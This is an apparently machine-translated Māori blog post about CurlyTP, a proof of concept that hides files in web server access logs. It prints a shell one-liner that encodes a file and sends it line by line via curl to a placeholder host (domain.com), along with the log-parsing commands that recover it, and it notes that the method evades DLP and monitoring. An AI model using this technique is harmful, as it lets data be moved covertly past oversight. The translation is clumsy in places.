ProHoster > Блог > Whakahaerenga > Te whakawhiti i nga karere ngaro ma nga raarangi tūmau

Te whakawhiti i nga karere ngaro ma nga raarangi tūmau

E ai ki te whakamaramatanga a Wikipedia, ko te maturuturunga mate he taputapu whakapae e mahi ana ki te whakawhiti korero, etahi taonga ranei i waenga i nga tangata e whakamahi ana i tetahi waahi ngaro. Ko te whakaaro karekau te tangata e tutaki - engari ka whakawhiti korero tonu hei pupuri i te haumarutanga o te whakahaere.

Ko te waahi huna kia kaua e aro. Na reira, i roto i te ao tuimotu he maha nga wa e whakamahia ana e ratou nga mea mohio: he pereki tuwhera ki te pakitara, he pukapuka whare pukapuka, he kowhao ranei i roto i te rakau.

He maha nga taputapu whakamunatanga me te whakaingoatanga i runga i te Ipurangi, engari ko te meka o te whakamahi i enei taputapu ka aro. I tua atu, ka aukatihia pea i te taumata umanga, kawanatanga ranei. Me aha?

Ko Ryan Flowers te kaiwhakawhanake i whakatakoto he whiringa pai - whakamahia tetahi tūmau tukutuku hei wahi huna. Mena ka whakaarohia e koe, he aha te mahi a te tūmau tukutuku? Ka whiwhi tono, ka whakaputa i nga konae me te tuhi i nga raarangi. Na ka tuhia e ia nga tono katoa, ahakoa he he!

Te ahua nei ka taea e tetahi tūmau paetukutuku te penapena tata ki nga karere katoa i roto i te raarangi. I whakaaro nga puawai me pehea te whakamahi i tenei.

Ka tukuna e ia tenei whiringa:

  1. Tangohia he kōnae kuputuhi (karere ngaro) ka tatau i te hash (md5sum).
  2. Ka whakawaeheretia e matou (gzip+uuencode).
  3. Ka tuhi matou ki te rangitaki ma te whakamahi i te tono pohehe ki te tūmau.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Hei panui i tetahi konae, me mahi koe i enei mahi i roto i te raupapa whakamuri: wetewete me te wetewete i te konae, tirohia te hash (ka taea te tuku humarie te hash ki runga i nga awa tuwhera).

Ka whakakapihia nga waahi ki te =+=kia kore ai he mokowhiti i te wahitau. Ko te kaupapa, e kiia nei e te kaituhi ko CurlyTP, e whakamahi ana i te whakawaehere base64, penei i nga taapiri imeera. Ka mahia te tono me te kupu matua ?transfer?kia ngawari te kimi a te kaiwhiwhi i roto i nga raarangi.

He aha ta tatou e kite ana i roto i nga rakau mo tenei keehi?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Ka rite ki te korero i mua ake nei, ki te whiwhi karere ngaro me mahi koe i nga mahi i roto i te raupapa whakamuri:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

He ngawari te mahi aunoa. Md5sum ōrite ana, ā, ka whakaū ngā ihirangi o te kōnae i tika te wetewete i ngā mea katoa.

He tino ngawari te tikanga. "Ko te kaupapa o tenei mahi ko te whakamatau noa ka taea te whakawhiti i nga konae ma nga tono paetukutuku iti, ka mahi ki runga i tetahi tuunga paetukutuku me nga raarangi tuhinga maamaa. Ko te mea nui, he wahi huna ia tūmau tukutuku!” ta Flowers.

Ko te tikanga, ka mahi noa te tikanga mena ka uru te kaiwhiwhi ki nga raarangi tūmau. Engari ko taua urunga e whakaratohia ana, hei tauira, na te maha o nga hosters.

Me pehea te whakamahi?

E ai ki a Ryan Flowers ehara ia i te tohunga mo te haumaru korero, a, karekau ia e whakahiato rarangi o nga whakamahinga ka taea mo CurlyTP. Ki a ia, he tohu noa tenei o te ariā ko nga taputapu mohio e kitea ana e tatou i ia ra ka taea te whakamahi i runga i te tikanga kore.

Ko te tikanga, he maha nga painga o tenei tikanga mo etahi atu "huna" rite Whakataka Mate Mamati ranei Pouaka Pirate: kaore e hiahiatia he whirihoranga motuhake i runga i te taha tūmau, i etahi kawa motuhake ranei - kaore hoki e whakaohooho i te hunga e aro turuki ana i nga waka. Kaore pea he punaha SORM, DLP ranei ka matawai i nga URL mo nga konae kuputuhi kua kopeke.

Koinei tetahi o nga huarahi ki te tuku karere ma nga konae ratonga. Ka maumahara koe ki te waahi o etahi kamupene matatau Nga Mahi Kaiwhakawhanake i roto i nga Pane HTTP i roto ranei i te waehere o nga wharangi HTML.

Te whakawhiti i nga karere ngaro ma nga raarangi tūmau

Ko te whakaaro ko nga kaihanga paetukutuku anake ka kite i tenei hua o te Aranga, i te mea kaore te tangata noa e titiro ki nga pane, ki te waehere HTML ranei.

Te whakawhiti i nga karere ngaro ma nga raarangi tūmau

Source: will.com

Tāpiri i te kōrero